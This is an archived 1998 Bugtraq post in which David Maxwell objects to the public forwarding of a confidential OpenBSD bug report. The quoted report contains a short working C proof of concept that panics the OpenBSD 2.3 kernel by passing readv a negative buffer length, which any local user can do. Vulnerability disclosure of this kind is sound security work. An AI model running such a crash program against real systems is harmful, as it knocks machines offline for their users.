[7394] in bugtraq

home help back first fref pref prev next nref lref last post

Re: Fwd: Any user can panic OpenBSD machine

daemon@ATHENA.MIT.EDU (David Maxwell)
Mon Jul 27 16:58:53 1998

Date: 	Mon, 27 Jul 1998 16:00:49 -0300
Reply-To: David Maxwell <david@WWW.FUNDY.CA>
From: David Maxwell <david@WWW.FUNDY.CA>
X-To:         Michael Fuhr <mfuhr@DIMENSIONAL.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <19980727112359.18461@dimensional.com>; from Michael Fuhr on Mon,
              Jul 27, 1998 at 11:23:59AM -0600

Since this bug is explicitly marked confidential, and was only opened today,
would it not have been reasonable to delay forwarding this. Given that the
OpenBSD people are particularly enthusiastic about security auditing, I expect
it will be fixed quickly.

                                                        David Maxwell

 On Mon, Jul 27, 1998 at 11:23:59AM -0600, Michael Fuhr wrote:
> -----Forwarded message from jon@oaktree.co.uk-----
>
> Message-Id: <199807271126.MAA16724@chalk.oaktree.net.uk>
> Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST)
> From: jon@oaktree.co.uk
> To: gnats@openbsd.org
> X-Send-Pr-Version: 3.97
> Subject: kernel/549: Any user can panic OpenBSD machine
> Sender: owner-bugs@openbsd.org
>
>
> >Number:         549
> >Category:       kernel
> >Synopsis:       readv with -ve block size panics kernel
> >Confidential:   yes
> >Severity:       critical
> >Priority:       high
> >Responsible:    bugs
> >State:          open
> >Class:          sw-bug
> >Submitter-Id:   net
> >Arrival-Date:   Mon Jul 27 05:40:02 MDT 1998
> >Last-Modified:
> >Originator:     Jon Ribbens
> >Organization:
> \/ Jon Ribbens / jon@oaktree.co.uk
> >Release:        2.3
> >Environment:
>
>         System      : OpenBSD 2.3
>         Architecture: OpenBSD.i386
>         Machine     : i386
> >Description:
>         readv with one of the blocks having a -ve size panics the kernel.
>         Oops.
>
> >How-To-Repeat:
>
> #include <sys/types.h>
> #include <sys/uio.h>
> #include <unistd.h>
>
> int main(void) {
>   struct iovec iov[1];
>   char buffer[1024];
>
>   iov[0].iov_base = buffer;
>   iov[0].iov_len = -1;
>
>   return readv(0, iov, 1);
> }
>
>         run the above program, type a few characters, press return, observe
>         either kernel panic or machine hang. panic message is
>         "panic: ureadc: non-positive resid". Any user can do this.
>
>
> >Fix:
>         Dunno I'm afraid.
>
>
> >Audit-Trail:
> >Unformatted:
>
> -----End of forwarded message-----
>
> --
> Michael Fuhr
> http://www.fuhr.net/~mfuhr/
home help back first fref pref prev next nref lref last post